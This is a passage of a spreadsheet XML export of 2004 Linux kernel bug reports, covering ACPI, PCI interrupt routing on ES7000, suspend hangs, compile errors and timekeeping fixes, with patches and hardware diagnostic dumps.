ANSI SCSI revision: 05 --==-=-=-=-=-=-==-=-=- nicathlon ~ # cat /proc/interrupts CPU0 0: 1728425 IO-APIC-edge timer 1: 10 IO-APIC-edge i8042 8: 2 IO-APIC-edge rtc 9: 0 IO-APIC-level acpi 12: 59 IO-APIC-edge i8042 15: 33 IO-APIC-edge ide1 16: 163573 IO-APIC-level libata, ehci_hcd, nvidia 18: 334427 IO-APIC-level uhci_hcd 19: 41883 IO-APIC-level uhci_hcd, eth0 21: 65474 IO-APIC-level uhci_hcd, uhci_hcd, uhci_hcd, ehci_hcd 22: 883 IO-APIC-level VIA8233 23: 5 IO-APIC-level eth1 NMI: 0 LOC: 1728264 ERR: 0 MIS: 0 -=-=-==-=-=- nicathlon ~ # sensors it87-isa-0290 Adapter: ISA adapter VCore 1: +1.68 V (min = +1.42 V, max = +1.57 V) ALARM VCore 2: +0.00 V (min = +2.40 V, max = +2.61 V) ALARM +3.3V: +3.30 V (min = +3.14 V, max = +3.47 V) +5V: +4.97 V (min = +4.76 V, max = +5.24 V) +12V: +11.90 V (min = +11.39 V, max = +12.61 V) -12V: -27.36 V (min = -12.63 V, max = -11.41 V) ALARM -5V: -13.64 V (min = -5.26 V, max = -4.77 V) ALARM Stdby: +5.13 V (min = +4.76 V, max = +5.24 V) VBat: +4.08 V fan1: 0 RPM (min = 0 RPM, div = 2) fan2: 0 RPM (min = 2657 RPM, div = 2) ALARM fan3: 0 RPM (min = 2657 RPM, div = 2) ALARM M/B Temp: +59</t>
  </si>
  <si>
    <t>ACPI_FUNCTION_TRACE() missing return's</t>
  </si>
  <si>
    <t>2004-09-03 09:16 UTC</t>
  </si>
  <si>
    <t>I have noticed a problem within many of the Linux ACPI-related drivers. When ACPI_FUNCTION_TRACE() is used, all return() statements within the function should use the ACPI return macros (return_ACPI_STATUS, etc.) instead of just a raw return. These return macros maintain the function nesting count (nesting count is incremented by ACPI_FUNCTION_TRACE, and decremented by the return macros.) The nesting depth is very useful when analyzing execution traces of ACPI code.</t>
  </si>
  <si>
    <t>nfsroot.c fails to compile</t>
  </si>
  <si>
    <t>2004-09-04 03:14 UTC</t>
  </si>
  <si>
    <t>Lucas Hazel</t>
  </si>
  <si>
    <t>2004-09-04 14:49 UTC</t>
  </si>
  <si>
    <t>Problem Description: There is a bug in nfsroot.c [line 499]: nfs_copy_fh(nfs_data.root, fh); Both parameters for this function are of type *nfs_fh. Solution: nfs_copy_fh((struct nfs_fh *)&amp;nfs_data.root, &amp;fh);</t>
  </si>
  <si>
    <t>2.6.8-1.521</t>
  </si>
  <si>
    <t>PCI interrupts set up incorrectly due to platform GSI override</t>
  </si>
  <si>
    <t>2004-09-06 10:14 UTC</t>
  </si>
  <si>
    <t>Natalie Protasevich</t>
  </si>
  <si>
    <t>2004-10-25 20:43 UTC</t>
  </si>
  <si>
    <t>acpi_config-interrupts</t>
  </si>
  <si>
    <t>Distribution: Any distribution based on 2.6.8 kernel Hardware Environment: ES7000 IA-32 servers Software Environment: System initialization Problem Description: We ran into a problem on ES7000 IA-32 systems with PCI interrupts initialization. The PCI devices in the IRQ override range of the first IO-APIC (pins 0-11) were failing. Some SCSI cards would time out, and Ethernet cards won't function. The system won't boot if this happened to be a boot controller. After investigation it turned out that the problem occurs when PCI overrides are implemented on a platform, which is the case on ES7000 IA-32. When platform GSI replaces the "standard" GSI, the new value doesn't get propagated back to the routine that completes rte setup. Below is a code change that fixed that, which we tested on ES7000, as well as on generic Intel boxes Steps to reproduce: Boot ES7000 with 2.6.8 kernel and several controlletrs in the first I/O module (first IO-APICs). Most of the cards won't work, and /proc/interrupts will show that some PCI interrupts were registered as egde-triggered: root@localhost root]# cat /proc/interrupts CPU0 CPU1 CPU2 CPU3 0: 653233 40015 34686 30010 IO-APIC-edge timer 1: 11 0 0 0 IO-APIC-edge i8042 4: 12 0 0 0 IO-APIC-edge eth0 &lt;--- edge triggered 5: 6323 3202 0 0 IO-APIC-level aic7xxx, eth1 6: 0 0 0 0 IO-APIC-edge aic7xxx &lt;-- -edge triggered 8: 1 0 0 0 IO-APIC-edge rtc 12: 59 0 0 0 IO-APIC-edge i8042 161: 0 0 0 0 IO-APIC-level acpi diff -Naur linux-2.6.8/include/asm-i386/mpspec.h linux8/include/asm- i386/mpspec.h --- linux-2.6.8/include/asm-i386/mpspec.h 2004-08-14 01:36:10.000000000 - 0400 +++ linux8/include/asm-i386/mpspec.h 2004-08-15 06:16:27.000000000 -0400 @@ -33,7 +33,7 @@ extern void mp_register_ioapic (u8 id, u32 address, u32 gsi_base); extern void mp_override_legacy_irq (u8 bus_irq, u8 polarity, u8 trigger, u32 gsi); extern void mp_config_acpi_legacy_irqs (void); -extern void mp_register_gsi (u32 gsi, int edge_level, int active_high_low); +extern int mp_register_gsi (u32 gsi, int edge_level, int active_high_low); #endif /*CONFIG_ACPI_BOOT*/ #define PHYSID_ARRAY_SIZE BITS_TO_LONGS(MAX_APICS) diff -Naur linux-2.6.8/arch/i386/kernel/acpi/boot.c linux8/arch/i386/kernel/acpi/boot.c --- linux-2.6.8/arch/i386/kernel/acpi/boot.c 2004-08-14 01:37:40.000000000 - 0400 +++ linux8/arch/i386/kernel/acpi/boot.c 2004-08-15 06:15:24.000000000 -0400 @@ -442,6 +442,7 @@ unsigned int acpi_register_gsi(u32 gsi, int edge_level, int active_high_low) { unsigned int irq; + unsigned int plat_gsi; #ifdef CONFIG_PCI /* @@ -463,10 +464,10 @@ #ifdef CONFIG_X86_IO_APIC if (acpi_irq_model == ACPI_IRQ_MODEL_IOAPIC) { - mp_register_gsi(gsi, edge_level, active_high_low); + plat_gsi = mp_register_gsi(gsi, edge_level, active_high_low); } #endif - acpi_gsi_to_irq(gsi, &amp;irq); + acpi_gsi_to_irq(plat_gsi, &amp;irq); return irq; } EXPORT_SYMBOL(acpi_register_gsi); diff -Naur linux-2.6.8/arch/i386/kernel/mpparse.c linux8/arch/i386/kernel/mpparse.c --- linux-2.6.8/arch/i386/kernel/mpparse.c 2004-08-14 01:36:44.000000000 - 0400 +++ linux8/arch/i386/kernel/mpparse.c 2004-08-15 06:16:18.000000000 -0400 @@ -1051,7 +1051,7 @@ int (*platform_rename_gsi)(int ioapic, int gsi); -void mp_register_gsi (u32 gsi, int edge_level, int active_high_low) +int mp_register_gsi (u32 gsi, int edge_level, int active_high_low) { int ioapic = -1; int ioapic_pin = 0; @@ -1066,7 +1066,7 @@ ioapic = mp_find_ioapic(gsi); if (ioapic &lt; 0) { printk(KERN_WARNING "No IOAPIC for GSI %u\n", gsi); - return; + return -1; } ioapic_pin = gsi - mp_ioapic_routing[ioapic].gsi_base; @@ -1085,12 +1085,12 @@ printk(KERN_ERR "Invalid reference to IOAPIC pin " "%d-%d\n", mp_ioapic_routing[ioapic].apic_id, ioapic_pin); - return; + return gsi; } if ((1&lt;&lt;bit) &amp; mp_ioapic_routing[ioapic].pin_programmed[idx]) { Dprintk(KERN_DEBUG "Pin %d-%d already programmed\n", mp_ioapic_routing[ioapic].apic_id, ioapic_pin); - return; + return gsi; } mp_ioapic_routing[ioapic].pin_programmed[idx] |= (1&lt;&lt;bit); @@ -1098,6 +1098,7 @@ io_apic_set_pci_routing(ioapic, ioapic_pin, gsi, edge_level == ACPI_EDGE_SENSITIVE ? 0 : 1, active_high_low == ACPI_ACTIVE_HIGH ? 0 : 1); + return gsi; } #endif /*CONFIG_X86_IO_APIC &amp;&amp; (CONFIG_ACPI_INTERPRETER || CONFIG_ACPI_BOOT)*/</t>
  </si>
  <si>
    <t>PCI slot is not working on ES7000 due to PCI irq 0</t>
  </si>
  <si>
    <t>2004-09-06 11:22 UTC</t>
  </si>
  <si>
    <t>2004-10-25 20:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Any distribution running Linux kernel at 2.6.8 level Hardware Environment: ES7000 IA-32 Software Environment: System initialization Problem Description: One of the PCI slots on the first IO-APIC of ES7000 won't work due to PCI IRQ overrides. PRT parsing in the ACPI driver does not recognize IRQ 0 as a valid PCI interrupt. This means that any device with an interrupt line wired to IRQ 0 will not be assigned an IRQ for that interrupt line. ACPI driver uses 0 as error return while parsing GSIs, but for the ES7000 it is a legitimate GSI. Attached is a proposed solution to use (-1) as an error code. This gives us back the last failing slot :) (see bug #3349) Steps to reproduce: This problem occurs on ES7000 first PCI module. Depending on the card, it is possible to reproduce it as follows: 1. Plug in a two function card in the forth slot, a three function card in the third or forth slot or a four function card in the second, third, or forth slot. 2. Plug in a card with a bridge into the fourth slot or a multi function card with a bridge into the third or forth slot We saw this problem having dual channel Megaraid controller in the 4th slot.</t>
  </si>
  <si>
    <t>S3 state hang the machine</t>
  </si>
  <si>
    <t>2.6.8.1 vanilla</t>
  </si>
  <si>
    <t>2004-09-07 03:45 UTC</t>
  </si>
  <si>
    <t>Daniele Depetrini</t>
  </si>
  <si>
    <t>2004-11-08 14:29 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.1 Hardware Environment: Ibm R40 Software Environment: Any Problem Description: When I activate the S3 state, the machine stop (seems) properly. The "moon" icon is activating. But after that, it's completely blocked. Will stop to respond to any key (also a lont time pressure of power button). The only solution is to detach the power supply AND the battery and reboot. Steps to reproduce:</t>
  </si>
  <si>
    <t>DAC960 and sym2 driver conflict</t>
  </si>
  <si>
    <t>2004-09-07 04:56 UTC</t>
  </si>
  <si>
    <t>2005-11-19 14:35 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: A motherboard Sym53c896 driven by a Mylex Acceleraid 200 and a sym53c810a Problem Description: When the sym2 driver loads, it tries to initialise the 896, notices that it's being controlled by the Mylex and then shuts the chip down, rather than leaving it active.</t>
  </si>
  <si>
    <t>functional but not present; setting present is wrong</t>
  </si>
  <si>
    <t>2004-09-08 00:19 UTC</t>
  </si>
  <si>
    <t>2008-10-24 22:58 UTC</t>
  </si>
  <si>
    <t>hi, when developping pnpacpi [1], I discover a bug. In acpi_bus_get_status, if the device is not present but functional, the device is set to functional. But it's not good : all the device disable in bios are set to present even worse there are 2 printer ports PNP0400 and PNP0401, which cause conflic because the driver want register the both device... A workaround sould be to set the device to not functional, so the device will not be in the available devices. Matthieu [1] http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=109430451522335&amp;w=2</t>
  </si>
  <si>
    <t>syntax error in drivers/cdrom/cdu31a.c</t>
  </si>
  <si>
    <t>2.6.9-rc1-bk14</t>
  </si>
  <si>
    <t>2004-09-08 01:26 UTC</t>
  </si>
  <si>
    <t>Ullrich Sigwanz</t>
  </si>
  <si>
    <t>2004-10-12 04:55 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 9.0 Hardware Environment: Pentium Celeron on an Epox-Board Software Environment: Problem Description: the -bk14 patch causes a syntax error in drivers/cdrom/cdu31a.c msleep(100): must read msleep(100); (semicolon instead of a the faulty colon) The faulty lines in the patch are... @@ -960,8 +959,7 @@ if (((result_buffer[0] &amp; 0xf0) == 0x20) &amp;&amp; (num_retries &lt; MAX_CDU31A_RETRIES)) { num_retries++; - current-&gt;state = TASK_INTERRUPTIBLE; - schedule_timeout(HZ / 10); /* Wait .1 seconds on retries */ + msleep(100): goto retry_cd_operation; } Steps to reproduce: just compile</t>
  </si>
  <si>
    <t>IDE CD-ROM does not correctly handle the end of media for some CD-R/CD-RW</t>
  </si>
  <si>
    <t>2.6.9rc1</t>
  </si>
  <si>
    <t>2004-09-08 07:08 UTC</t>
  </si>
  <si>
    <t>2006-12-01 12:26 UTC</t>
  </si>
  <si>
    <t>According to the SCSI specification the capacity of a CD-R/RW is "undefined" to the tune of 75 sectors (150K). A medium error can arise as a result and functions like cp /dev/hdc foo.iso don't give valid complete results (the end of the ISO may go away) due to readahead causing errors within thr 75 sector uncertainty. This works correctly with ide-scsi as sr.c knows how to handle the variability (it trims the volume size and retries) but fails with ide-cd. Its one of only two things I've found preventing ide-cd being used for all CD devices.</t>
  </si>
  <si>
    <t>set_rtc_mmss functioin smp deadlock</t>
  </si>
  <si>
    <t>2.4.18-14 2.4.27,2.6.11</t>
  </si>
  <si>
    <t>2004-09-11 03:46 UTC</t>
  </si>
  <si>
    <t>zhao_haifeng</t>
  </si>
  <si>
    <t>2006-08-04 05:43 UTC</t>
  </si>
  <si>
    <t>3377 3378</t>
  </si>
  <si>
    <t>Distribution: RedHat Linux 7.1 7.2 7.3 8.0 9.0 Hardware Environment: Intel IA32 dual Xeon 3.0Ghz with HT(HyperThread). Software Environment: RedHat Linux 7.3 with NTP Problem Description: Message "set_rtc_mmss: can't update from 59 to 5" in shown on the console, machine died. Steps to reproduce: in the function static int set_rtc_mmss(unsigned long nowtime) of arch/i386/kernel/time.c following lines. .... } else { printk(KERN_WARNING "set_rtc_mmss: can't update from %d to %d\n", cmos_minutes, real_minutes); /*************************note here ************* missed the. spin_unlock(&amp;rtc_lock); */ retval = -1; } ....</t>
  </si>
  <si>
    <t>system hangs with uncomprensible and excessive pagination</t>
  </si>
  <si>
    <t>2004-09-11 14:45 UTC</t>
  </si>
  <si>
    <t>Francisco Javier Jim</t>
  </si>
  <si>
    <t>2006-01-05 08:42 UTC</t>
  </si>
  <si>
    <t>Distribution:Debian 3.1 (unstable, daily updated) Hardware Environment: pentium4 ht, 512Ram, asusp4p800, plextor 40x12A recorder. Software Environment: cdrecord (only problems with this kernel version) Problem Description: system do unexpected pagination, the system is unusable, only when i go to record a cd, buffer record goes down and system begins to do swap, never ends... i left the system for 16 hours and when returned the system was in the same state. Steps to reproduce: - compile kernel for pentium 4 ht (not ht extended edition), with smp. - burn a cd with k3b, cdrecord or wathever. - the system, when you have recorded half cd or less, goes to do a hyperpagination without some reason. i have compiled other kernels, with same .config file (copying it between older to new kernels) last kernel, good working is i have written this email: 2.6.5 I have no tested to overload system, for example using java (i work with it) or tomcat server, i think is system oveload problem, not cd burning problem. it happens when system goes into few memory, but only in 2.6.8 and 2.6.8.1 versions. Thanks. Best Regards.</t>
  </si>
  <si>
    <t>No parallel recognition at boot time</t>
  </si>
  <si>
    <t>2004-09-12 03:41 UTC</t>
  </si>
  <si>
    <t>Gaetano Sferra</t>
  </si>
  <si>
    <t>2006-01-05 08:56 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10 Hardware Environment: Intel Pentium 4 (ICH4) Software Environment: Not applicable Problem Description: As in summary, no parallel port is found at boot time and the parport and parport_pc modules are not loaded at all. If I try to start parport and parport_pc throught modprobe no errors occurs but the /dev/parport node isn't created. The port works because if I attempt to load the imm driver for my parallel iomega zip I got a new scsi device and I can mount and work the device as well. Steps to reproduce: Not applicable</t>
  </si>
  <si>
    <t>S3 wake fails: phys vs. virtual wake vector -  IBM X40</t>
  </si>
  <si>
    <t>2.6.8 from debian testing</t>
  </si>
  <si>
    <t>2004-09-13 10:55 UTC</t>
  </si>
  <si>
    <t>Jacob Emcken</t>
  </si>
  <si>
    <t>2004-11-15 19:39 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: IBM x40 Software Environment: Debian GNU/Linux (Sarge/testing) with a 2.6.8 kernel Problem Description: I can make the laptop sleep with the command: echo -n "mem" &gt; /sys/power/state NOTE: I have to remove USB 2.0 first (rmmod ehci_hcd) for the laptom to sleep. It seems that the laptops goes to sleep without errors. On the laptop there is a small LED indicating that the laptop sleeps. This goes on after the screens turns black and the harddrive and fan stops spinning. Steps to reproduce: Write the following on the console as root: rmmod ehci_hcd echo -n "mem" &gt; /sys/power/state</t>
  </si>
  <si>
    <t>EHCI fails to start</t>
  </si>
  <si>
    <t>2.6.6, 2.6.7, 2.6.8.1</t>
  </si>
  <si>
    <t>2004-09-13 14:28 UTC</t>
  </si>
  <si>
    <t>Krzysiek Pawlik</t>
  </si>
  <si>
    <t>2004-11-19 02:39 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: IBM ThinkPad R40 Software Environment: gcc 3.3.x Problem Description: When kernel starts before it spawns init process, it loads all drivers that are builtin (in my case the EHCI driver), but when I move the mouse that is connected to USB port before the driver is loaded I get this: ehci_hcd 0000:00:1d.7: Intel Corp. 82801DB (ICH4) USB2 EHCI Controller PCI: Setting latency timer of device 0000:00:1d.7 to 64 irq 11: nobody cared! [&lt;c0105dc6&gt;] __report_bad_irq+0x2a/0x8b [&lt;c0105eb0&gt;] note_interrupt+0x6f/0x9f [&lt;c01060ca&gt;] do_IRQ+0xdd/0xdf [&lt;c01046bc&gt;] common_interrupt+0x18/0x20 [&lt;c011a817&gt;] __do_softirq+0x2f/0x80 [&lt;c011a88e&gt;] do_softirq+0x26/0x28 [&lt;c01060b1&gt;] do_IRQ+0xc4/0xdf [&lt;c01046bc&gt;] common_interrupt+0x18/0x20 [&lt;c01064d7&gt;] setup_irq+0x69/0xaa [&lt;c0250529&gt;] usb_hcd_irq+0x0/0x67 [&lt;c0106182&gt;] request_irq+0x83/0xc5 [&lt;c02541d3&gt;] usb_hcd_pci_probe+0x1f5/0x4e0 [&lt;c0250529&gt;] usb_hcd_irq+0x0/0x67 [&lt;c01d45cc&gt;] pci_device_probe_static+0x52/0x61 [&lt;c01d4604&gt;] __pci_device_probe+0x29/0x2b [&lt;c01d4632&gt;] pci_device_probe+0x2c/0x4a [&lt;c020f035&gt;] bus_match+0x3f/0x6a [&lt;c020f147&gt;] driver_attach+0x56/0x80 [&lt;c020f3cb&gt;] bus_add_driver+0x91/0xa3 [&lt;c020f7ed&gt;] driver_register+0x2f/0x33 [&lt;c01d4847&gt;] pci_register_driver+0x34/0x44 [&lt;c03bacec&gt;] init+0x23/0x30 [&lt;c03a2721&gt;] do_initcalls+0x27/0xb3 [&lt;c0123e32&gt;] init_workqueues+0x17/0x31 [&lt;c010027e&gt;] init+0x0/0xfe [&lt;c01002a8&gt;] init+0x2a/0xfe [&lt;c0102258&gt;] kernel_thread_helper+0x0/0xb [&lt;c010225d&gt;] kernel_thread_helper+0x5/0xb handlers: [&lt;c0250529&gt;] (usb_hcd_irq+0x0/0x67) Disabling IRQ #11 And the mouse doesn't work - the machine has to be rebooted in order to load the EHCI driver correctly. Steps to reproduce: Move the mouse before the EHCI driver is loaded.</t>
  </si>
  <si>
    <t>since 2.6.6</t>
  </si>
  <si>
    <t>2004-09-14 08:27 UTC</t>
  </si>
  <si>
    <t>Lorenz Froihofer</t>
  </si>
  <si>
    <t>2005-06-10 00:11 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 Hardware Environment: Pentium II, 233MHz, 256MB RAM, 10/100Mbit PCMCIA network card (axnet_cs driver) Problem Description: The network interface corresponding to the 10/100Mbit PCMCIA network card (axnet driver, compiled in kernel) stops working for incomming data transfers, e.g. copying data via scp or ftp to this computer running ssh or ftp. Interestingly, it is no problem to copy data from this computer to other hosts. Note that the file to transfer should have at least a size of 1MB but it also happens for files with size &lt; 1MB. The network interface breaks immediately after the copying starts. The only way to get the network interface working again is to restart it. This problem can be avoided by limiting the bandwith that is used by the file transfer program, for scp a value of "scp -limit 500" to limit the used bandwidth to 500Kbit/s keeps the network interface running, 1000Kbit/s is already too much.</t>
  </si>
  <si>
    <t>2004-09-14 14:45 UTC</t>
  </si>
  <si>
    <t>Closing laptop lid on &gt;=2.6.9-rc1 == freeze</t>
  </si>
  <si>
    <t>Hinrik</t>
  </si>
  <si>
    <t>2004-11-30 23:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Dell Inspiron 8600c laptop, bios revision A10(newest) Software Environment: Linux 2.6.9-rc1/rc2 Problem Description: I upgraded from 2.6.8.1 to 2.6.9-rc1 recently, and every time I close the lid on the laptop the system freezes. I tried 2.6.9-rc2 also with the same results. At first I thought this was an ACPI-related bug, but even though I disable ACPI entirely, this still happens. I really don't want to go back to 2.6.8.1 because SpeedStep doesn't work there. :l</t>
  </si>
  <si>
    <t>Phil Dibowitz</t>
  </si>
  <si>
    <t>xtime value is incorrect</t>
  </si>
  <si>
    <t>2004-09-15 07:47 UTC</t>
  </si>
  <si>
    <t>Vladimir Grouzdev</t>
  </si>
  <si>
    <t>2004-11-18 16:13 UTC</t>
  </si>
  <si>
    <t>The xtime value may become incorrect when the update_wall_time(ticks) function is called for multiple ticks (kernel/timer.c). static void update_wall_time(unsigned long ticks) { do { ticks--; update_wall_time_one_tick(); } while (ticks); if (xtime.tv_nsec &gt;= 1000000000) { xtime.tv_nsec -= 1000000000; xtime.tv_sec++; second_overflow(); } } The bug is that the xtime variable is updated (potentially multiple times) inside the loop but it is normalized only once outside of the loop. Suggested fix: static void update_wall_time(unsigned long ticks) { do { ticks--; update_wall_time_one_tick(); if (xtime.tv_nsec &gt;= 1000000000) { xtime.tv_nsec -= 1000000000; xtime.tv_sec++; second_overflow(); } } while (ticks); }</t>
  </si>
  <si>
    <t>passive mode is not left, once entered</t>
  </si>
  <si>
    <t>2004-09-16 11:04 UTC</t>
  </si>
  <si>
    <t>Thomas Renninger</t>
  </si>
  <si>
    <t>2007-06-26 12:14 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Pentium M Software Environment: Problem Description: Steps to reproduce: echo "xx:xx:low_value:xx:xx:" &gt;/proc/acpi/thermal_zone/*/trip_points echo "xx:xx:high_value:xx:xx:" &gt;/proc/acpi/thermal_zone/*/trip_points passive mode still active, even the temperature is far below the trip point</t>
  </si>
  <si>
    <t>2.6.9-rc2</t>
  </si>
  <si>
    <t>Arno Wagner</t>
  </si>
  <si>
    <t>cdrom.h</t>
  </si>
  <si>
    <t>2004-09-18 17:21 UTC</t>
  </si>
  <si>
    <t>Greg Davey</t>
  </si>
  <si>
    <t>2006-01-05 08:47 UTC</t>
  </si>
  <si>
    <t>Distribution:N/A Hardware Environment:i386 Software Environment:glibc-2.3.2 gcc-3.2.3 Problem Description: when attempting to compile anything that includes cdrom.h unless __KERNEL_STRICT_NAMES is explicitly #undef'd a large number of syntax/undeclared errors occur. I would think that since cdrom.h requires some typedefs in little_endian.h, that are only available if __KERNEL_STRICT_NAMES is undefined, that it should either make sure of this or undefine it explicitly. This was not an issue in the 2.4 branch. Steps to reproduce: compile this code #include &lt;stdio.h&gt;//really anything that #include(s) features.h #include &lt;linux/cdrom.h&gt; int main() { /*bug maybe?*/ }</t>
  </si>
  <si>
    <t>kernel BUG at mm/rmap.c:407!</t>
  </si>
  <si>
    <t>2.6.8.1-7</t>
  </si>
  <si>
    <t>2004-09-19 14:00 UTC</t>
  </si>
  <si>
    <t>Marlon Cabrera oliveira</t>
  </si>
  <si>
    <t>2005-04-23 07:31 UTC</t>
  </si>
  <si>
    <t>Distribution: Yoper 2.1.0-4 Hardware Environment: Linux version 2.6.8.1-7 (root@tingui) (gcc version 3.4.1) #2 SMP Fri Sep 17 18:35:59 BRT 2004 root@tingui ~ # cat /proc/ioports 0000-001f : dma1 0020-0021 : pic1 0040-005f : timer 0060-006f : keyboard 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 01f0-01f7 : ide0 0376-0376 : ide1 03c0-03df : vesafb 03f6-03f6 : ide0 03f8-03ff : serial 0a00-0a0f : 0000:00:14.0 0cf8-0cff : PCI conf1 dc00-dc7f : 0000:01:06.0 dc00-dc7f : 0000:01:06.0 e000-efff : PCI Bus #02 e000-e0ff : 0000:02:05.0 ff00-ff0f : 0000:00:14.1 ff00-ff07 : ide0 ff08-ff0f : ide1 root@tingui ~ # cat /proc/interrupts CPU0 CPU1 0: 1538769 0 IO-APIC-edge timer 1: 1969 0 IO-APIC-edge i8042 12: 79489 0 IO-APIC-edge i8042 14: 10045 0 IO-APIC-edge ide0 15: 14 0 IO-APIC-edge ide1 16: 15847 0 IO-APIC-level eth1 17: 1 0 IO-APIC-level ATI IXP 18: 3916 0 IO-APIC-level eth0 21: 0 0 IO-APIC-level acpi NMI: 0 0 LOC: 1538636 1538374 ERR: 0 MIS: 0 root@tingui ~ # lspci -vvv 00:00.0 Host bridge: ATI Technologies Inc: Unknown device 5833 (rev 02) Subsystem: Asustek Computer, Inc.: Unknown device 8107 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 64 Region 0: Memory at f8000000 (32-bit, prefetchable) Region 1: Memory at f7f00000 (32-bit, non-prefetchable) [size=4K] Capabilities: [a0] AGP version 3.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+Rate=x4,x8 Command: RQ=1 ArqSz=0 Cal=0 SBA+ AGP- GART64- 64bit- FW- Rate=&lt;none&gt; 00:01.0 PCI bridge: ATI Technologies Inc: Unknown device 5838 (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Bus: primary=00, secondary=02, subordinate=02, sec-latency=64 I/O behind bridge: 0000e000-0000efff Memory behind bridge: fe100000-fe4fffff Prefetchable memory behind bridge: e7e00000-f7dfffff Secondary status: 66Mhz+ FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- Expansion ROM at 0000e000 [disabled] [size=4K] BridgeCtl: Parity- SERR+ NoISA- VGA+ MAbort- &gt;Reset- FastB2B- 00:13.0 USB Controller: ATI Technologies Inc: Unknown device 4347 (rev 01) (prog-if 10 [OHCI]) Subsystem: Asustek Computer, Inc.: Unknown device 8108 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64, Cache Line Size 10 Interrupt: pin A routed to IRQ 19 Region 0: Memory at fe800000 (32-bit, non-prefetchable) 00:13.1 USB Controller: ATI Technologies Inc: Unknown device 4348 (rev 01) (prog-if 10 [OHCI]) Subsystem: Asustek Computer, Inc.: Unknown device 8108 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64, Cache Line Size 10 Interrupt: pin A routed to IRQ 19 Region 0: Memory at fe900000 (32-bit, non-prefetchable) 00:14.0 SMBus: ATI Technologies Inc ATI SMBus (rev 17) Subsystem: Asustek Computer, Inc.: Unknown device 8108 Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Region 0: I/O ports at 0a00 Region 1: Memory at 7c000000 (32-bit, non-prefetchable) [size=1K] 00:14.1 IDE interface: ATI Technologies Inc: Unknown device 4349 (prog-if 8a [Master SecP PriP]) Subsystem: Asustek Computer, Inc.: Unknown device 8108 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort+ &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 0: I/O ports at &lt;ignored&gt; Region 1: I/O ports at &lt;ignored&gt; Region 2: I/O ports at &lt;ignored&gt; Region 3: I/O ports at &lt;ignored&gt; Region 4: I/O ports at ff00 [size=16] 00:14.3 ISA bridge: ATI Technologies Inc: Unknown device 434c Subsystem: Asustek Computer, Inc.: Unknown device 8108 Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:14.4 PCI bridge: ATI Technologies Inc: Unknown device 4342 (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Bus: primary=00, secondary=01, subordinate=01, sec-latency=64 I/O behind bridge: 00001000-0000dfff Memory behind bridge: fd900000-fe0fffff Prefetchable memory behind bridge: e7c00000-e7dfffff Secondary status: 66Mhz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity+ SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- 00:14.5 Multimedia audio controller: ATI Technologies Inc IXP150 AC'97 Audio Controller Subsystem: Asustek Computer, Inc.: Unknown device 810d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=slow &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (500ns min), Cache Line Size 10 Interrupt: pin B routed to IRQ 17 Region 0: Memory at feb00000 (32-bit, 